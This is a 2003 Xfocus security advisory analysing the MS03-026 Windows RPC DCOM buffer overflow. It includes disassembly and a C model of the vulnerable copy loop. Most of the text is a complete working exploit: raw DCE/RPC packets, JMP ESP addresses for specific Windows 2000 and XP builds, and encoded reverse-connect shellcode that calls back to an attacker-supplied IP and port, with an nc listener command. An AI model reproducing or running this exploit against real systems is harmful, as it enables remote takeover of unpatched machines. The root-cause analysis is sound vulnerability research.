The Analysis of LSD's Buffer Overrun in Windows RPC Interface (code revised)





bugtraq

The Analysis of LSD's Buffer Overrun in Windows RPC Interface
Author: Flashsky
Site: www.xfocus.org WWW.VENUSTECH.COM.CN WWW.SHOPSKY.COM
Email: flashsky@xfocus.org
Translator: benjurry
Email: benjurry@xfocus.org



Foreword

On July 16th, 2003, LSD announced that they had discovered a critical security vulnerability in all recent versions of Microsoft operating systems. The vulnerability affects default installations of Windows NT 4.0, Windows 2000, Windows XP and Windows 2003 Server, but they did not publish code or any technical details. In order to analyse and exploit the vulnerability, members of Xfocus researched the problem and read code day and night. In the process we found the "Microsoft Windows 2000 RPC DCOM Interface DOS AND Privilege Escalation Vulnerability", and we have now worked out the cause of the vulnerability found by LSD. We thank all members of Xfocus, as well as yuange, EYAS and IPXODI, who gave us much help. At the same time, we admire LSD for their brilliance.

Analysis

In fact, MS03-026 fixes two vulnerabilities: a local stack overflow and a remote stack overflow. Both result from the same interface; the API that is handled improperly is the following:
HRESULT CoGetInstanceFromFile(
  COSERVERINFO * pServerInfo, 
  CLSID * pclsid,
  IUnknown * punkOuter,
  DWORD dwClsCtx,
  DWORD grfMode,
  OLECHAR * szName,
  ULONG cmq,
  MULTI_QI * rgmqResults
);


The sixth parameter is szName. MSDN says of it: "File to initialize the object with using IPersistFile::Load. May not be NULL." This parameter is what causes the buffer overflow:

hr = CoGetInstanceFromFile(pServerInfo,NULL,0,CLSCTX_REMOTE_SERVER,STGM_READWRITE,L"C:\\1234561111111111111111111111111.doc",1,&qi);

When the filename is too long, Windows produces a local buffer overflow, because the GetPathForServer function in RPCSS only reserves 0x220 bytes for it. However, the API checks for the file locally first, and we cannot create a file whose name is longer than 0x220 bytes, so this API cannot be used to exploit the bug directly; instead the same function can be reached through LPC by constructing the packet ourselves. Here we only focus on the remote stack overflow :)

After the client passes the parameter to the server, the server converts it into the following form:
L"\\servername\c$\1234561111111111111111111111111.doc"
The server then extracts the servername first. Here is the bug: Windows does not check the parameter and reserves only 0x20 bytes on the stack, 0x20 bytes (16 wide characters) being the maximum length of a NetBIOS name. GetMachineName copies 16-bit words into that buffer until it meets the word 0x005C ("\"), so a longer servername overflows the stack.
The key code is listed below:


GetPathForServer:
text:761543DA                 push    ebp
text:761543DB                 mov     ebp, esp
text:761543DD                 sub     esp, 20h            <----- only 0x20 bytes are reserved
text:761543E0                 mov     eax, [ebp+arg_4]
text:761543E3                 push    ebx
text:761543E4                 push    esi
text:761543E5                 mov     esi, [ebp+hMem]
text:761543E8                 push    edi
text:761543E9                 push    5Ch
text:761543EB                 pop     ebx
text:761543EC                 mov     [eax], esi
text:761543EE                 cmp     [esi], bx
text:761543F1                 mov     edi, esi
text:761543F3                 jnz     loc_761544BF
text:761543F9                 cmp     [esi+2], bx
text:761543FD                 jnz     loc_761544BF
text:76154403                 lea     eax, [ebp+String1]  <----- address where the servername is placed, only 0x20 bytes long
text:76154406                 push    0
text:76154408                 push    eax
text:76154409                 push    esi                 <----- this is the filename parameter
text:7615440A                 call    GetMachineName
......                                                    when GetMachineName returns, the buffer has already overflowed.

GetMachineName:
text:7614DB6F                 mov     eax, [ebp+arg_0]
text:7614DB72                 mov     ecx, [ebp+arg_4]
text:7614DB75                 lea     edx, [eax+4]
text:7614DB78                 mov     ax, [eax+4]
text:7614DB7C                 cmp     ax, 5Ch             <----- check whether it is 0x5C; if so, the servername ends
text:7614DB80                 jz      short loc_7614DB93
text:7614DB82                 sub     edx, ecx
text:7614DB84
text:7614DB84 loc_7614DB84:                           ; CODE XREF: sub_7614DA19+178↓j
text:7614DB84                 mov     [ecx], ax           <----- write the servername to the buffer; if it is longer than 0x20 bytes, the buffer overflows
text:7614DB87                 inc     ecx
text:7614DB88                 inc     ecx
text:7614DB89                 mov     ax, [ecx+edx]
text:7614DB8D                 cmp     ax, 5Ch
text:7614DB91                 jnz     short loc_7614DB84
text:7614DB93

Now we have found the problem and can exploit it. The only question is that the "\\servername" part is normally generated by the system, but we can construct it ourselves by sending malformed messages.
BTW, the shellcode cannot contain 0x5C, because GetMachineName checks for it: the copy loop compares each 16-bit word with 0x5C and stops at the first match, so the word 0x005C anywhere in the shellcode truncates the copy.


Exploit:
1. The exploit uses JMP ESP (FF E4) to transfer control, so the address has to be adjusted for other Windows versions;
2. The shellcode makes a reverse connection, so run nc -l -p XXX first;
3. The shellcode length must satisfy sizeof(sc) % 16 == 12; if it does not, pad with 0x90, or the RPC packet layout will be wrong;
4. Before the overflowed function returns, the two arguments that follow the return address are still written through, so the two values placed after the return address must point to writable memory;
5. The exploit uses JMP ESP, but the bug can also be exploited by overwriting the SEH handler.
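The frame layout and copy loop described above, as an added example that is neither code from the Xfocus post nor from rpcss.dll: a user-mode C model of GetMachineName writing through the 0x20-byte String1 buffer, a bounded version beside it, and a builder that lays the "server name" out the way sc[] does (18 wide chars of filler, the return address at offset 0x24, two writable addresses, then the payload). The field offsets, the 18-char filler and the 0x5C terminator come from the listing and from sc[]; 0x77df4c29, 0x76166e38 and 0x76166e0d are the page's Windows 2000 SP4 constants; the filename tail "\c$\x.doc", the filler byte and all function names are this example's own assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Model of the GetPathForServer frame from the disassembly: String1 is the
 * 0x20-byte name buffer at ebp-0x20, followed by saved ebp, the return address
 * and the two arguments at ebp+8 / ebp+0xC.  The ebx/esi/edi pushed after
 * "sub esp,20h" sit below String1 and are not reached by the copy. */
struct frame {
    uint16_t name[16];   /* String1: 16 wide chars, the NetBIOS name limit */
    uint32_t saved_ebp;  /* ebp+0 */
    uint32_t ret;        /* ebp+4: offset 0x24 into the copied name */
    uint32_t arg_0;      /* ebp+8: hMem */
    uint32_t arg_4;      /* ebp+C: written through after return, must be writable */
};

static uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)v;         p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16); p[3] = (unsigned char)(v >> 24);
}

/* Vulnerable copy, as GetMachineName does it: start at path[2] (after the
 * leading "\\") and copy 16-bit words until the word 0x005C.  There is no
 * length check; the clamp at sizeof(*f) only keeps this model inside its own
 * memory.  Returns bytes written; anything beyond 0x20 has overflowed String1. */
size_t vuln_get_machine_name(const uint16_t *path, struct frame *f)
{
    unsigned char *dst = (unsigned char *)f;
    size_t off = 0;
    for (const uint16_t *p = path + 2; *p != 0x5C; p++) {
        if (off + 2 > sizeof(*f))
            break;
        memcpy(dst + off, p, 2);
        off += 2;
    }
    return off;
}

/* Hardened version: the name must fit 15 wide chars plus a terminator and the
 * path must actually contain a "\" after it.  Returns the length or -1. */
int fixed_get_machine_name(const uint16_t *path, uint16_t out[16])
{
    size_t n = 0;
    for (const uint16_t *p = path + 2; *p != 0x5C; p++) {
        if (*p == 0 || n >= 15)
            return -1;
        out[n++] = *p;
    }
    out[n] = 0;
    return (int)n;
}

/* ASCII to wide chars (host order), for building test paths. */
size_t make_wide(const char *s, uint16_t *out, size_t max_words)
{
    size_t n = strlen(s);
    if (n + 1 > max_words)
        return 0;
    for (size_t i = 0; i <= n; i++)
        out[i] = (unsigned char)s[i];
    return n;
}

/* Lay the "server name" out the way sc[] does: 18 filler wide chars (0x24
 * bytes: String1 plus saved ebp), the return address, the two writable
 * addresses, the payload, then the assumed tail "\c$\x.doc".  The payload must
 * be even-sized and free of the word 0x005C, which would end the copy early.
 * Returns the path length in wide chars, the unit of the NDR count fields. */
size_t build_exploit_path(uint16_t *path, size_t max_words, uint32_t ret,
                          uint32_t arg_0, uint32_t arg_4,
                          const unsigned char *payload, size_t payload_len)
{
    static const uint16_t tail[] = {'\\', 'c', '$', '\\', 'x', '.', 'd', 'o', 'c', 0};
    unsigned char *b = (unsigned char *)path;
    size_t off, total = 4 + 36 + 12 + payload_len + sizeof tail;
    if (payload_len % 2 || total > max_words * 2)
        return 0;
    for (size_t i = 0; i < payload_len; i += 2)
        if (payload[i] == 0x5C && payload[i + 1] == 0x00)
            return 0;
    path[0] = path[1] = '\\';
    for (int i = 0; i < 18; i++)
        path[2 + i] = 'X';
    off = 4 + 36;
    put_le32(b + off, ret);   off += 4;
    put_le32(b + off, arg_0); off += 4;
    put_le32(b + off, arg_4); off += 4;
    memcpy(b + off, payload, payload_len); off += payload_len;
    memcpy(b + off, tail, sizeof tail);    off += sizeof tail;
    return off / 2;
}

/* Run the vulnerable copy on a zeroed frame and return what the saved return
 * address holds afterwards, read little-endian as the CPU would. */
uint32_t overwritten_return_address(const uint16_t *path, size_t *bytes_written)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    *bytes_written = vuln_get_machine_name(path, &f);
    return le32((const unsigned char *)&f + offsetof(struct frame, ret));
}
```

build_exploit_path returns a length in wide chars, which is why the exploit below adds sizeof(sc)/2, not sizeof(sc), to the two count fields at the start of request2.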


#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>
#pragma  comment(lib,"ws2_32")

/* DCE/RPC bind to the ISystemActivator interface on port 135 */
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
 
/* RPC request carrying the activation call; the length fields fixed up in main() live in here */
unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};
 
/* NDR header of the path string (count, offset, count; 0x20 wide chars for the
 * unmodified "\\servername\c$\...doc") followed by the leading "\\" */
unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

/* rest of the path after the shellcode: "\C$\123456111111111111111.doc" in wide chars */
unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
 
 
 

/* JMP ESP (FF E4) addresses, little-endian; copied over sc+36, the saved return address */
unsigned char jmpesp_cn_sp3[4]    = {0x29,0x2c,0xe2,0x77};   /* 0x77e22c29, w2k Chinese SP3 */
unsigned char jmpesp_cn_sp4[4]    = {0x29,0x4c,0xdf,0x77};   /* 0x77df4c29, w2k Chinese SP4 */
unsigned char jmpesp_en_xp_sp1[4] = {0xdb,0x37,0xd7,0x77};   /* 0x77d737db, WinXP English SP1 */
 

 

unsigned char sc[]=
    /* 18 wide chars of filler: 0x20 bytes of String1 plus the saved ebp (offset 0..0x23) */
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x46\x00\x58\x00"

    /* offset 0x24: return address, overwritten by main() from the jmpesp_* tables */
    "\x29\x4c\xdf\x77" //sp4
//"\x29\x2c\xe2\x77"//0x77e22c29

    "\x38\x6e\x16\x76\x0d\x6e\x16\x76"  // the two arguments after the return address: must be writable memory addresses
    // Below is the shellcode. You can substitute your own, but sizeof(sc) % 16 must stay 12;
    // if it does not, pad with some 0x90 bytes.
    // The shellcode must not contain 0x00 or 0x5C.
    /* decoder: XOR 0x199 bytes with 0x93 starting right after itself */
    "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
    "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
    "\x93\x40\xe2\xfa"
    // code (XOR-0x93 encoded reverse-connect shellcode; port and IP patched in by main())
    "\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1"
    "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2"
    "\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93"
    "\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7"
    "\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0"
    "\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8"
    "\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93"
    "\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93"
    "\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0"
    "\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87"
    "\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60"
    "\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5"
    "\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90"
    "\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22"
    "\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18"
    "\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92"
    "\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3"
    "\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93"
    "\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9"
    "\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18"
    "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
    "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
    "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
    "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
    "\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
    "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
 
/* trailing structures of the request after the path string */
unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
 
int main(int argc, char **argv)
{
    WSADATA WSAData;
    SOCKET sock;
    int len, len1;
    SOCKADDR_IN addr_in;
    unsigned short port = 135;
    unsigned char buf1[0x1000];
    unsigned char buf2[0x1000];
    unsigned short port1;
    DWORD cb;

    printf("RPC DCOM overflow Vulnerability discovered by LSD\n");
    printf("Code by FlashSky,Flashsky xfocus org,benjurry,benjurry xfocus org\n");
    printf("Welcome to our English Site: http://www.xfocus.org\n");
    printf("Welcome to our Chinese Site: http://www.xfocus.net\n");

    if (argc < 5)
    {
        printf("usage: %s targetip localIP LocalPort SPVersion\n", argv[0]);
        printf("SPVersion:\n0 w2k Chinese version +sp3\n1 w2k Chinese version +SP4\n2 winxp English version +sp1\n");
        exit(1);
    }

    /* patch the JMP ESP address for the chosen target over the return address at sc+36 */
    if (atoi(argv[4]) == 0)
        memcpy(sc + 36, jmpesp_cn_sp3, sizeof(jmpesp_cn_sp3));
    else if (atoi(argv[4]) == 1)
        memcpy(sc + 36, jmpesp_cn_sp4, sizeof(jmpesp_cn_sp4));
    else if (atoi(argv[4]) == 2)
        memcpy(sc + 36, jmpesp_en_xp_sp1, sizeof(jmpesp_en_xp_sp1));
    else
    {
        printf("unknown SPVersion: %s\n", argv[4]);
        exit(1);
    }

    if (WSAStartup(MAKEWORD(2, 0), &WSAData) != 0)
    {
        printf("WSAStartup error.Error:%d\n", WSAGetLastError());
        return 1;
    }

    addr_in.sin_family = AF_INET;
    addr_in.sin_port = htons(port);
    addr_in.sin_addr.S_un.S_addr = inet_addr(argv[1]);

    if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
    {
        printf("Socket failed.Error:%d\n", WSAGetLastError());
        return 1;
    }
    if (WSAConnect(sock, (struct sockaddr *)&addr_in, sizeof(addr_in), NULL, NULL, NULL, NULL) == SOCKET_ERROR)
    {
        printf("Connect failed.Error:%d\n", WSAGetLastError());
        return 1;
    }

    /* reverse-connect port and IP, XOR-masked with the decoder key 0x93 so they survive decoding */
    port1 = htons((unsigned short)atoi(argv[3]));   // port for the reverse connection
    port1 ^= 0x9393;
    cb = inet_addr(argv[2]);                         // IP for the reverse connection
    cb ^= 0x93939393;
    *(unsigned short *)&sc[330 + 0x30] = port1;
    *(unsigned int *)&sc[335 + 0x30] = cb;
    len = sizeof(sc);

    memcpy(buf2, request1, sizeof(request1));
    len1 = sizeof(request1);
    /* adjust the two NDR count fields of the path string by the shellcode length in wide chars */
    *(DWORD *)(request2) = *(DWORD *)(request2) + sizeof(sc) / 2;
    *(DWORD *)(request2 + 8) = *(DWORD *)(request2 + 8) + sizeof(sc) / 2;
    memcpy(buf2 + len1, request2, sizeof(request2));
    len1 = len1 + sizeof(request2);
    memcpy(buf2 + len1, sc, sizeof(sc));
    len1 = len1 + sizeof(sc);
    memcpy(buf2 + len1, request3, sizeof(request3));
    len1 = len1 + sizeof(request3);
    memcpy(buf2 + len1, request4, sizeof(request4));
    len1 = len1 + sizeof(request4);
    /* fix up the lengths of the various structures (the -0xc assumes sizeof(sc) % 16 == 12) */
    *(DWORD *)(buf2 + 8) = *(DWORD *)(buf2 + 8) + sizeof(sc) - 0xc;
    *(DWORD *)(buf2 + 0x10) = *(DWORD *)(buf2 + 0x10) + sizeof(sc) - 0xc;
    *(DWORD *)(buf2 + 0x80) = *(DWORD *)(buf2 + 0x80) + sizeof(sc) - 0xc;
    *(DWORD *)(buf2 + 0x84) = *(DWORD *)(buf2 + 0x84) + sizeof(sc) - 0xc;
    *(DWORD *)(buf2 + 0xb4) = *(DWORD *)(buf2 + 0xb4) + sizeof(sc) - 0xc;
    *(DWORD *)(buf2 + 0xb8) = *(DWORD *)(buf2 + 0xb8) + sizeof(sc) - 0xc;
    *(DWORD *)(buf2 + 0xd0) = *(DWORD *)(buf2 + 0xd0) + sizeof(sc) - 0xc;
    *(DWORD *)(buf2 + 0x18c) = *(DWORD *)(buf2 + 0x18c) + sizeof(sc) - 0xc;

    if (send(sock, bindstr, sizeof(bindstr), 0) == SOCKET_ERROR)
    {
        printf("Send failed.Error:%d\n", WSAGetLastError());
        return 1;
    }

    len = recv(sock, buf1, 1000, 0);   /* bind_ack */
    if (send(sock, buf2, len1, 0) == SOCKET_ERROR)
    {
        printf("Send failed.Error:%d\n", WSAGetLastError());
        return 1;
    }
    len = recv(sock, buf1, 1024, 0);
    closesocket(sock);
    WSACleanup();
    return 0;
}



About XFOCUS.ORG
   Xfocus is a non-profit and free technology organization founded in 1998 in China. We devote ourselves to the research and demonstration of weaknesses related to network services and communication security.
We hope to use new technical tools to achieve our goal and to broaden our outlook. We also hope to communicate with and help each other through this amazing Internet.

   From the Internet. For the Internet. Have fun!
---


                Regards!

                xundi
                xundi@xfocus.org
                2003-07-25


